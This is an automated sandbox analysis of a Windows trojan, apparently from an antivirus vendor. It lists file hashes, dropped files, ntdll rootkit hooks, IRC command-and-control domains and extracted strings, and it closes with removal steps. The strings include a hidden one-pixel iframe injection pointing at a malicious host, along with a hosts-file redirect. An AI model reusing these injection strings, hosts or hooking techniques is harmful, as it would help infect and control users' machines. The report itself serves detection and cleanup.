MD5: a174d62152a3f2a694549eeb19e5410b
SHA1: 13d3ea59a05e2249ef3bf104cb53bdb720335e3d
SHA256: b69733298b8666bee932ed2152de4a7a9094d78c9013556a0b0ffd9b6addddae
SSDeep: 1536:jY8lYxSccCgwWYaziLoF2N2CFLcVygpgkD6mVUsfApGFMddUPTXRBtopfMr 3:jESccsWlXCFLcVygpgMm0yfU9Bta33
Size: 179228 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ntvdm.exe:3820

The Trojan injects its code into the following process(es):

%original file name%.exe:1504

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (471952 bytes)
C:\a174d62152a3f2a694549eeb19e5410b.usr (41424 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (437256 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (165641628 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)

The process ntvdm.exe:3820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs87C6.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs87C7.tmp (269 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs87C6.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs87C7.tmp (0 bytes)

Registry activity

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 12
dedb3373d31e0ce73f867c5d571473b3
b9323d6cec8fa12cf71a7751bb84e053
0ed1831d384ea5ef28231bf804ff383e
b732b585786e0deb68dc30facce165d4
177abe696d0f067e633beb0d455b9c89
b3f914c9ea8671bf7aeb55f89463b063
a292340828a0fad205ddedf4da216310
2704720d932ae1a351b9282daf5f8208
c7e116f32750928217894a88769f8330
07cef319f85a5696ca73824394de071a
246690f764ed5b3869a0b8f43e1efddd
c2a97f2bb092e5f0b2e6fb5ea4689862

URLs

URL	IP
sys.zief.pl	148.81.111.121
teredo.ipv6.microsoft.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Reply Sinkhole - irc-sinkhole.cert.pl

Traffic

The Trojan connects to the servers at the folowing location(s):

`.rsrc

D$(PSSh

ccRegVfy.exe

ccApp.exe

IEXPLORE.EXE

windows

\*.exe

.text

.data

.rsrc

msvcrt.dll

KERNEL32.dll

nddeapir.pdb

_acmdln

m.Zw%

ADVAPI32.DLL

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoysys.zief.pl

core.ircgalaxy.pl

NICK avabcadz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 jL.chura.pl

#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

KERNEL32.DLL

windowsupdate

drweb

user32.dll

kernel32.dll

MSVCIRT.dll

MSVCRT.dll

5.1.2600.0 (xpclient.010817-1148)

NDDEAPIR.EXE

Windows

Operating System

5.1.2600.0

%original file name%.exe_1504_rwx_00401000_00002000:

D$(PSSh

%original file name%.exe_1504_rwx_00419000_00005000:

ADVAPI32.DLL

\USERINIT.EXE

%s:*:enabled:@shell32.dll,-1

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer

Qoysys.zief.pl

core.ircgalaxy.pl

NICK avabcadz

SFC.DLL

SFC_OS.DLL

USER32.DLL

SHLWAPI.DLL

WSOCK32.DLL

WININET.DLL

%.6x . . :%c%.8x%x %s

JOIN

127.0.0.1 jL.chura.pl

#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

KERNEL32.DLL

windowsupdate

drweb

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   ntvdm.exe:3820
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (471952 bytes)
   C:\a174d62152a3f2a694549eeb19e5410b.usr (41424 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (437256 bytes)
   C:\Windows\USR_Shohdi_Photo_USR.exe (165641628 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs87C6.tmp (335 bytes)
   C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs87C7.tmp (269 bytes)

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.